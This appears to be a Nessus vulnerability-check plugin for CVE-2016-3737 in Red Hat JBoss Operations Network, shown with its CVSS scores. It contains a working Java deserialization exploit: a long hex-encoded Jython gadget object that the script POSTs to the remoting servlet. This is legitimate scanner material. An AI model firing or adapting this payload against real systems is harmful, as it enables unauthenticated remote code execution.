9 High
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:P/I:P/A:C
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
0.008 Low
EPSS
Percentile
81.5%
The remote Red Hat JBoss Operations Network server is affected by a remote code execution vulnerability due to unsafe deserialize calls of unauthenticated Java objects to the Jython library. An unauthenticated, remote attacker can exploit this, by sending specially crafted Java objects to the HTTP interface, to execute arbitrary code on the target host.
#
# (C) Tenable Network Security, Inc.
#
include("compat.inc");
if (description)
{
script_id(91487);
script_version("1.11");
script_cvs_date("Date: 2019/11/19");
script_cve_id("CVE-2016-3737");
script_bugtraq_id(90430);
script_xref(name:"TRA", value:"TRA-2016-22");
script_name(english:"Red Hat JBoss Operations Network Java Object Deserialization RCE");
script_summary(english:"Sends an unexpected Java object to the server.");
script_set_attribute(attribute:"synopsis", value:
"The remote JBoss Operations Network server is affected by a remote
code execution vulnerability");
script_set_attribute(attribute:"description", value:
"The remote Red Hat JBoss Operations Network server is affected by a
remote code execution vulnerability due to unsafe deserialize calls of
unauthenticated Java objects to the Jython library. An
unauthenticated, remote attacker can exploit this, by sending
specially crafted Java objects to the HTTP interface, to execute
arbitrary code on the target host.");
script_set_attribute(attribute:"see_also", value:"https://www.tenable.com/security/research/tra-2016-22");
script_set_attribute(attribute:"see_also", value:"https://access.redhat.com/security/cve/cve-2016-3737");
script_set_attribute(attribute:"solution", value:
"Red Hat has released JBoss Operations Network 3.3 Update 06 to address
this issue; however, Tenable Research has confirmed that the update
did not resolve the issue. To mitigate this issue, users should enable
agent authentication.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:C");
script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
script_set_attribute(attribute:"cvss_score_source", value:"CVE-2016-3737");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"exploited_by_nessus", value:"true");
script_set_attribute(attribute:"vuln_publication_date", value:"2016/05/02");
script_set_attribute(attribute:"patch_publication_date", value:"2016/06/24");
script_set_attribute(attribute:"plugin_publication_date", value:"2016/06/06");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:redhat:jboss_operations_network");
script_end_attributes();
script_category(ACT_ATTACK);
script_family(english:"Misc.");
script_copyright(english:"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_dependencies("jboss_on_detect.nbin");
script_require_keys("installed_sw/JBoss Operations Network");
script_require_ports("Services/www", 7080, 7443);
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("webapp_func.inc");
include("http.inc");
appname = 'JBoss Operations Network';
get_install_count(app_name:appname, exit_if_zero:TRUE);
port = get_http_port(default:7080);
install = get_single_install(app_name:appname, port:port);
# This blob is (eventually) a PyFunction that, upon deserialization, will simply execute
# the python byte code "return". Technically speaking, we could do much more than that
# but we only have builtins available to us (so r/w files), but it is far easier to determine
# that the remote server is vulnerable via the class cast exception that occurs on success.
crafted_object = '\xac\xed\x00\x05\x73\x72\x00\x17\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x50\x72\x69\x6f\x72\x69\x74\x79\x51\x75\x65\x75\x65\x94\xda\x30\xb4\xfb\x3f\x82\xb1\x03\x00\x02\x49\x00\x04\x73\x69\x7a\x65\x4c\x00\x0a\x63\x6f\x6d\x70\x61\x72\x61\x74\x6f\x72\x74\x00\x16\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x43\x6f\x6d\x70\x61\x72\x61\x74\x6f\x72\x3b\x78\x70\x00\x00\x00\x02\x73\x7d\x00\x00\x00\x01\x00\x14\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x43\x6f\x6d\x70\x61\x72\x61\x74\x6f\x72\x78\x72\x00\x17\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x50\x72\x6f\x78\x79\xe1\x27\xda\x20\xcc\x10\x43\xcb\x02\x00\x01\x4c\x00\x01\x68\x74\x00\x25\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x72\x65\x66\x6c\x65\x63\x74\x2f\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x78\x70\x73\x72\x00\x1a\x6f\x72\x67\x2e\x70\x79\x74\x68\x6f\x6e\x2e\x63\x6f\x72\x65\x2e\x50\x79\x46\x75\x6e\x63\x74\x69\x6f\x6e\xe6\x2f\xd1\xed\x36\x06\xb6\x52\x02\x00\x08\x4c\x00\x08\x5f\x5f\x64\x69\x63\x74\x5f\x5f\x74\x00\x1a\x4c\x6f\x72\x67\x2f\x70\x79\x74\x68\x6f\x6e\x2f\x63\x6f\x72\x65\x2f\x50\x79\x4f\x62\x6a\x65\x63\x74\x3b\x4c\x00\x07\x5f\x5f\x64\x6f\x63\x5f\x5f\x71\x00\x7e\x00\x08\x4c\x00\x0a\x5f\x5f\x6d\x6f\x64\x75\x6c\x65\x5f\x5f\x71\x00\x7e\x00\x08\x4c\x00\x08\x5f\x5f\x6e\x61\x6d\x65\x5f\x5f\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x0c\x66\x75\x6e\x63\x5f\x63\x6c\x6f\x73\x75\x72\x65\x71\x00\x7e\x00\x08\x4c\x00\x09\x66\x75\x6e\x63\x5f\x63\x6f\x64\x65\x74\x00\x18\x4c\x6f\x72\x67\x2f\x70\x79\x74\x68\x6f\x6e\x2f\x63\x6f\x72\x65\x2f\x50\x79\x43\x6f\x64\x65\x3b\x5b\x00\x0d\x66\x75\x6e\x63\x5f\x64\x65\x66\x61\x75\x6c\x74\x73\x74\x00\x1b\x5b\x4c\x6f\x72\x67\x2f\x70\x79\x74\x68\x6f\x6e\x2f\x63\x6f\x72\x65\x2f\x50\x79\x4f\x62\x6a\x65\x63\x74\x3b\x4c\x00\x0c\x66\x75\x6e\x63\x5f\x67\x6c\x6f\x62\x61\x6c\x73\x71\x00\x7e\x00\x08\x78\x72\x00\x18\x6f\x72\x67\x2e\x70\x79\x74\x68\x6f\x6e\x2e\x63\x6f\x72\x65\x2e\x50\x79\x4f\x62\x6a\x65\x63\x74\xb3\x6a\x64\xf0\x6f\x10\xd3\x67\x02\x00\x02\x4c\x00\x09\x6a\x61\x76\x61\x50\x72\x6f\x78\x79\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x4c\x00\x07\x6f\x62\x6a\x74\x79\x70\x65\x74\x00\x18\x4c\x6f\x72\x67\x2f\x70\x79\x74\x68\x6f\x6e\x2f\x63\x6f\x72\x65\x2f\x50\x79\x54\x79\x70\x65\x3b\x78\x70\x70\x73\x72\x00\x23\x6f\x72\x67\x2e\x70\x79\x74\x68\x6f\x6e\x2e\x63\x6f\x72\x65\x2e\x50\x79\x54\x79\x70\x65\x24\x54\x79\x70\x65\x52\x65\x73\x6f\x6c\x76\x65\x72\x7b\x81\x53\xc5\x9e\x62\x6a\xf9\x02\x00\x03\x4c\x00\x06\x6d\x6f\x64\x75\x6c\x65\x71\x00\x7e\x00\x09\x4c\x00\x04\x6e\x61\x6d\x65\x71\x00\x7e\x00\x09\x4c\x00\x10\x75\x6e\x64\x65\x72\x6c\x79\x69\x6e\x67\x5f\x63\x6c\x61\x73\x73\x74\x00\x11\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x78\x70\x74\x00\x0b\x5f\x5f\x62\x75\x69\x6c\x74\x69\x6e\x5f\x5f\x74\x00\x08\x66\x75\x6e\x63\x74\x69\x6f\x6e\x76\x71\x00\x7e\x00\x07\x70\x70\x70\x74\x00\x08\x3c\x6d\x6f\x64\x75\x6c\x65\x3e\x70\x73\x72\x00\x1a\x6f\x72\x67\x2e\x70\x79\x74\x68\x6f\x6e\x2e\x63\x6f\x72\x65\x2e\x50\x79\x42\x79\x74\x65\x63\x6f\x64\x65\xac\x96\xf9\x29\x14\x55\x26\x12\x02\x00\x08\x49\x00\x0c\x63\x6f\x5f\x73\x74\x61\x63\x6b\x73\x69\x7a\x65\x49\x00\x05\x63\x6f\x75\x6e\x74\x5a\x00\x05\x64\x65\x62\x75\x67\x49\x00\x08\x6d\x61\x78\x43\x6f\x75\x6e\x74\x5b\x00\x07\x63\x6f\x5f\x63\x6f\x64\x65\x74\x00\x02\x5b\x42\x5b\x00\x09\x63\x6f\x5f\x63\x6f\x6e\x73\x74\x73\x71\x00\x7e\x00\x0b\x5b\x00\x09\x63\x6f\x5f\x6c\x6e\x6f\x74\x61\x62\x71\x00\x7e\x00\x18\x5b\x00\x08\x63\x6f\x5f\x6e\x61\x6d\x65\x73\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x78\x72\x00\x1a\x6f\x72\x67\x2e\x70\x79\x74\x68\x6f\x6e\x2e\x63\x6f\x72\x65\x2e\x50\x79\x42\x61\x73\x65\x43\x6f\x64\x65\x5e\x76\xd4\x44\x41\xc3\x94\x74\x02\x00\x0c\x49\x00\x0b\x63\x6f\x5f\x61\x72\x67\x63\x6f\x75\x6e\x74\x49\x00\x0e\x63\x6f\x5f\x66\x69\x72\x73\x74\x6c\x69\x6e\x65\x6e\x6f\x49\x00\x0a\x63\x6f\x5f\x6e\x6c\x6f\x63\x61\x6c\x73\x49\x00\x0c\x6a\x79\x5f\x6e\x70\x75\x72\x65\x63\x65\x6c\x6c\x49\x00\x05\x6e\x61\x72\x67\x73\x5a\x00\x07\x76\x61\x72\x61\x72\x67\x73\x5a\x00\x09\x76\x61\x72\x6b\x77\x61\x72\x67\x73\x5b\x00\x0b\x63\x6f\x5f\x63\x65\x6c\x6c\x76\x61\x72\x73\x71\x00\x7e\x00\x19\x4c\x00\x0b\x63\x6f\x5f\x66\x69\x6c\x65\x6e\x61\x6d\x65\x71\x00\x7e\x00\x09\x4c\x00\x08\x63\x6f\x5f\x66\x6c\x61\x67\x73\x74\x00\x1f\x4c\x6f\x72\x67\x2f\x70\x79\x74\x68\x6f\x6e\x2f\x63\x6f\x72\x65\x2f\x43\x6f\x6d\x70\x69\x6c\x65\x72\x46\x6c\x61\x67\x73\x3b\x5b\x00\x0b\x63\x6f\x5f\x66\x72\x65\x65\x76\x61\x72\x73\x71\x00\x7e\x00\x19\x5b\x00\x0b\x63\x6f\x5f\x76\x61\x72\x6e\x61\x6d\x65\x73\x71\x00\x7e\x00\x19\x78\x72\x00\x16\x6f\x72\x67\x2e\x70\x79\x74\x68\x6f\x6e\x2e\x63\x6f\x72\x65\x2e\x50\x79\x43\x6f\x64\x65\x74\x54\x66\x12\x37\x82\xc5\x3b\x02\x00\x01\x4c\x00\x07\x63\x6f\x5f\x6e\x61\x6d\x65\x71\x00\x7e\x00\x09\x78\x71\x00\x7e\x00\x0c\x70\x73\x71\x00\x7e\x00\x10\x71\x00\x7e\x00\x13\x74\x00\x08\x62\x79\x74\x65\x63\x6f\x64\x65\x76\x71\x00\x7e\x00\x17\x71\x00\x7e\x00\x16\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x70\x74\x00\x06\x6e\x6f\x6e\x61\x6d\x65\x73\x72\x00\x1d\x6f\x72\x67\x2e\x70\x79\x74\x68\x6f\x6e\x2e\x63\x6f\x72\x65\x2e\x43\x6f\x6d\x70\x69\x6c\x65\x72\x46\x6c\x61\x67\x73\x6c\xb8\x3b\x06\x8e\xbb\x10\x0f\x02\x00\x05\x5a\x00\x11\x64\x6f\x6e\x74\x5f\x69\x6d\x70\x6c\x79\x5f\x64\x65\x64\x65\x6e\x74\x5a\x00\x08\x6f\x6e\x6c\x79\x5f\x61\x73\x74\x5a\x00\x0e\x73\x6f\x75\x72\x63\x65\x5f\x69\x73\x5f\x75\x74\x66\x38\x4c\x00\x08\x65\x6e\x63\x6f\x64\x69\x6e\x67\x71\x00\x7e\x00\x09\x4c\x00\x05\x66\x6c\x61\x67\x73\x74\x00\x0f\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x53\x65\x74\x3b\x78\x70\x00\x00\x00\x70\x73\x72\x00\x24\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x45\x6e\x75\x6d\x53\x65\x74\x24\x53\x65\x72\x69\x61\x6c\x69\x7a\x61\x74\x69\x6f\x6e\x50\x72\x6f\x78\x79\x05\x07\xd3\xdb\x76\x54\xca\xd1\x02\x00\x02\x4c\x00\x0b\x65\x6c\x65\x6d\x65\x6e\x74\x54\x79\x70\x65\x71\x00\x7e\x00\x11\x5b\x00\x08\x65\x6c\x65\x6d\x65\x6e\x74\x73\x74\x00\x11\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x45\x6e\x75\x6d\x3b\x78\x70\x76\x72\x00\x18\x6f\x72\x67\x2e\x70\x79\x74\x68\x6f\x6e\x2e\x63\x6f\x72\x65\x2e\x43\x6f\x64\x65\x46\x6c\x61\x67\x00\x00\x00\x00\x00\x00\x00\x00\x12\x00\x00\x78\x72\x00\x0e\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x45\x6e\x75\x6d\x00\x00\x00\x00\x00\x00\x00\x00\x12\x00\x00\x78\x70\x75\x72\x00\x11\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x45\x6e\x75\x6d\x3b\xa8\x8d\xea\x2d\x33\xd2\x2f\x98\x02\x00\x00\x78\x70\x00\x00\x00\x02\x7e\x71\x00\x7e\x00\x28\x74\x00\x09\x43\x4f\x5f\x4e\x45\x53\x54\x45\x44\x7e\x71\x00\x7e\x00\x28\x74\x00\x14\x43\x4f\x5f\x47\x45\x4e\x45\x52\x41\x54\x4f\x52\x5f\x41\x4c\x4c\x4f\x57\x45\x44\x70\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00\x78\x70\x00\x00\x00\x02\x74\x00\x00\x71\x00\x7e\x00\x33\x00\x00\x00\x0a\x00\x00\x00\x00\x00\xff\xff\xff\xff\x75\x72\x00\x02\x5b\x42\xac\xf3\x17\xf8\x06\x08\x54\xe0\x02\x00\x00\x78\x70\x00\x00\x00\x04\x64\x00\x00\x53\x75\x72\x00\x1b\x5b\x4c\x6f\x72\x67\x2e\x70\x79\x74\x68\x6f\x6e\x2e\x63\x6f\x72\x65\x2e\x50\x79\x4f\x62\x6a\x65\x63\x74\x3b\x25\x04\x40\xd5\x1b\xd0\x04\x3f\x02\x00\x00\x78\x70\x00\x00\x00\x04\x73\x72\x00\x18\x6f\x72\x67\x2e\x70\x79\x74\x68\x6f\x6e\x2e\x63\x6f\x72\x65\x2e\x50\x79\x53\x74\x72\x69\x6e\x67\x2d\x43\xb5\xfa\x3c\xac\x49\xd1\x02\x00\x01\x4c\x00\x06\x73\x74\x72\x69\x6e\x67\x71\x00\x7e\x00\x09\x78\x72\x00\x1c\x6f\x72\x67\x2e\x70\x79\x74\x68\x6f\x6e\x2e\x63\x6f\x72\x65\x2e\x50\x79\x42\x61\x73\x65\x53\x74\x72\x69\x6e\x67\x25\x17\x51\xe8\xb3\x09\x2f\x9c\x02\x00\x00\x78\x72\x00\x1a\x6f\x72\x67\x2e\x70\x79\x74\x68\x6f\x6e\x2e\x63\x6f\x72\x65\x2e\x50\x79\x53\x65\x71\x75\x65\x6e\x63\x65\xa1\x41\x11\xa8\xfb\xc3\xae\x67\x02\x00\x01\x4c\x00\x09\x64\x65\x6c\x65\x67\x61\x74\x6f\x72\x74\x00\x27\x4c\x6f\x72\x67\x2f\x70\x79\x74\x68\x6f\x6e\x2f\x63\x6f\x72\x65\x2f\x53\x65\x71\x75\x65\x6e\x63\x65\x49\x6e\x64\x65\x78\x44\x65\x6c\x65\x67\x61\x74\x65\x3b\x78\x71\x00\x7e\x00\x0c\x70\x73\x71\x00\x7e\x00\x10\x71\x00\x7e\x00\x13\x74\x00\x03\x73\x74\x72\x76\x71\x00\x7e\x00\x38\x73\x72\x00\x1c\x6f\x72\x67\x2e\x70\x79\x74\x68\x6f\x6e\x2e\x63\x6f\x72\x65\x2e\x50\x79\x53\x65\x71\x75\x65\x6e\x63\x65\x24\x31\xd7\x1b\xb3\xc6\xac\x1f\x60\xd7\x02\x00\x01\x4c\x00\x06\x74\x68\x69\x73\x24\x30\x74\x00\x1c\x4c\x6f\x72\x67\x2f\x70\x79\x74\x68\x6f\x6e\x2f\x63\x6f\x72\x65\x2f\x50\x79\x53\x65\x71\x75\x65\x6e\x63\x65\x3b\x78\x72\x00\x25\x6f\x72\x67\x2e\x70\x79\x74\x68\x6f\x6e\x2e\x63\x6f\x72\x65\x2e\x53\x65\x71\x75\x65\x6e\x63\x65\x49\x6e\x64\x65\x78\x44\x65\x6c\x65\x67\x61\x74\x65\x17\xcf\xdb\x2f\xe9\xe7\x04\xc2\x02\x00\x00\x78\x70\x71\x00\x7e\x00\x3c\x71\x00\x7e\x00\x33\x73\x71\x00\x7e\x00\x38\x70\x71\x00\x7e\x00\x3d\x73\x71\x00\x7e\x00\x40\x71\x00\x7e\x00\x44\x74\x00\x13\x2e\x2f\x6e\x65\x73\x73\x75\x73\x5f\x6a\x79\x74\x68\x6f\x6e\x31\x2e\x70\x79\x73\x71\x00\x7e\x00\x38\x70\x71\x00\x7e\x00\x3d\x73\x71\x00\x7e\x00\x40\x71\x00\x7e\x00\x47\x74\x00\x02\x77\x2b\x73\x71\x00\x7e\x00\x38\x70\x71\x00\x7e\x00\x3d\x73\x71\x00\x7e\x00\x40\x71\x00\x7e\x00\x4a\x74\x00\x00\x75\x71\x00\x7e\x00\x34\x00\x00\x00\x00\x75\x71\x00\x7e\x00\x31\x00\x00\x00\x04\x74\x00\x04\x6f\x70\x65\x6e\x74\x00\x05\x77\x72\x69\x74\x65\x74\x00\x05\x63\x6c\x6f\x73\x65\x74\x00\x08\x65\x78\x65\x63\x66\x69\x6c\x65\x70\x73\x72\x00\x1b\x6f\x72\x67\x2e\x70\x79\x74\x68\x6f\x6e\x2e\x63\x6f\x72\x65\x2e\x50\x79\x53\x74\x72\x69\x6e\x67\x4d\x61\x70\xb4\x24\xfa\xff\x19\x86\x24\x79\x02\x00\x01\x4c\x00\x05\x74\x61\x62\x6c\x65\x74\x00\x24\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2f\x43\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x4d\x61\x70\x3b\x78\x71\x00\x7e\x00\x0c\x70\x73\x71\x00\x7e\x00\x10\x71\x00\x7e\x00\x13\x74\x00\x09\x73\x74\x72\x69\x6e\x67\x6d\x61\x70\x76\x71\x00\x7e\x00\x53\x73\x72\x00\x26\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2e\x43\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x48\x61\x73\x68\x4d\x61\x70\x64\x99\xde\x12\x9d\x87\x29\x3d\x03\x00\x03\x49\x00\x0b\x73\x65\x67\x6d\x65\x6e\x74\x4d\x61\x73\x6b\x49\x00\x0c\x73\x65\x67\x6d\x65\x6e\x74\x53\x68\x69\x66\x74\x5b\x00\x08\x73\x65\x67\x6d\x65\x6e\x74\x73\x74\x00\x31\x5b\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2f\x43\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x48\x61\x73\x68\x4d\x61\x70\x24\x53\x65\x67\x6d\x65\x6e\x74\x3b\x78\x70\x00\x00\x00\x0f\x00\x00\x00\x1c\x75\x72\x00\x31\x5b\x4c\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2e\x43\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x48\x61\x73\x68\x4d\x61\x70\x24\x53\x65\x67\x6d\x65\x6e\x74\x3b\x52\x77\x3f\x41\x32\x9b\x39\x74\x02\x00\x00\x78\x70\x00\x00\x00\x10\x73\x72\x00\x2e\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2e\x43\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x48\x61\x73\x68\x4d\x61\x70\x24\x53\x65\x67\x6d\x65\x6e\x74\x1f\x36\x4c\x90\x58\x93\x29\x3d\x02\x00\x01\x46\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x78\x72\x00\x28\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2e\x6c\x6f\x63\x6b\x73\x2e\x52\x65\x65\x6e\x74\x72\x61\x6e\x74\x4c\x6f\x63\x6b\x66\x55\xa8\x2c\x2c\xc8\x6a\xeb\x02\x00\x01\x4c\x00\x04\x73\x79\x6e\x63\x74\x00\x2f\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2f\x6c\x6f\x63\x6b\x73\x2f\x52\x65\x65\x6e\x74\x72\x61\x6e\x74\x4c\x6f\x63\x6b\x24\x53\x79\x6e\x63\x3b\x78\x70\x73\x72\x00\x34\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2e\x6c\x6f\x63\x6b\x73\x2e\x52\x65\x65\x6e\x74\x72\x61\x6e\x74\x4c\x6f\x63\x6b\x24\x4e\x6f\x6e\x66\x61\x69\x72\x53\x79\x6e\x63\x65\x88\x32\xe7\x53\x7b\xbf\x0b\x02\x00\x00\x78\x72\x00\x2d\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2e\x6c\x6f\x63\x6b\x73\x2e\x52\x65\x65\x6e\x74\x72\x61\x6e\x74\x4c\x6f\x63\x6b\x24\x53\x79\x6e\x63\xb8\x1e\xa2\x94\xaa\x44\x5a\x7c\x02\x00\x00\x78\x72\x00\x35\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2e\x6c\x6f\x63\x6b\x73\x2e\x41\x62\x73\x74\x72\x61\x63\x74\x51\x75\x65\x75\x65\x64\x53\x79\x6e\x63\x68\x72\x6f\x6e\x69\x7a\x65\x72\x66\x55\xa8\x43\x75\x3f\x52\xe3\x02\x00\x01\x49\x00\x05\x73\x74\x61\x74\x65\x78\x72\x00\x36\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2e\x6c\x6f\x63\x6b\x73\x2e\x41\x62\x73\x74\x72\x61\x63\x74\x4f\x77\x6e\x61\x62\x6c\x65\x53\x79\x6e\x63\x68\x72\x6f\x6e\x69\x7a\x65\x72\x33\xdf\xaf\xb9\xad\x6d\x6f\xa9\x02\x00\x00\x78\x70\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x5e\x73\x71\x00\x7e\x00\x62\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x5e\x73\x71\x00\x7e\x00\x62\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x5e\x73\x71\x00\x7e\x00\x62\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x5e\x73\x71\x00\x7e\x00\x62\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x5e\x73\x71\x00\x7e\x00\x62\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x5e\x73\x71\x00\x7e\x00\x62\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x5e\x73\x71\x00\x7e\x00\x62\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x5e\x73\x71\x00\x7e\x00\x62\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x5e\x73\x71\x00\x7e\x00\x62\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x5e\x73\x71\x00\x7e\x00\x62\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x5e\x73\x71\x00\x7e\x00\x62\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x5e\x73\x71\x00\x7e\x00\x62\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x5e\x73\x71\x00\x7e\x00\x62\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x5e\x73\x71\x00\x7e\x00\x62\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x5e\x73\x71\x00\x7e\x00\x62\x00\x00\x00\x00\x3f\x40\x00\x00\x70\x70\x78\x77\x04\x00\x00\x00\x03\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x49\x6e\x74\x65\x67\x65\x72\x12\xe2\xa0\xa4\xf7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6c\x75\x65\x78\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4e\x75\x6d\x62\x65\x72\x86\xac\x95\x1d\x0b\x94\xe0\x8b\x02\x00\x00\x78\x70\x00\x00\x00\x01\x71\x00\x7e\x00\x87\x78';
# post our crafted object to the server
path = "/jboss-remoting-servlet-invoker/ServerInvokerServlet/?generalizeSocketException=true";
resp = http_send_recv3(
method:"POST",
item:path,
data:crafted_object,
add_headers:make_array("Content-Type", "application/octet-stream", "JBoss-Remoting-Version", "22"),
port:port,
exit_on_fail:TRUE);
if (isnull(resp) || len(resp) != 3) audit(AUDIT_RESP_BAD, port);
if ("java.lang.ClassCastException: org.python.core.PySingleton cannot be cast to" >!< resp[2])
audit(AUDIT_INST_VER_NOT_VULN, appname, install["version"]);
report =
'\nNessus was able to exploit a Java deserialization vulnerability by' +
'\nsending a crafted Java object.' +
'\n';
security_report_v4(port:port, severity:SECURITY_HOLE, extra:report);
Vendor | Product | Version | CPE |
---|---|---|---|
redhat | jboss_operations_network | cpe:/a:redhat:jboss_operations_network |
9 High
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:P/I:P/A:C
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
0.008 Low
EPSS
Percentile
81.5%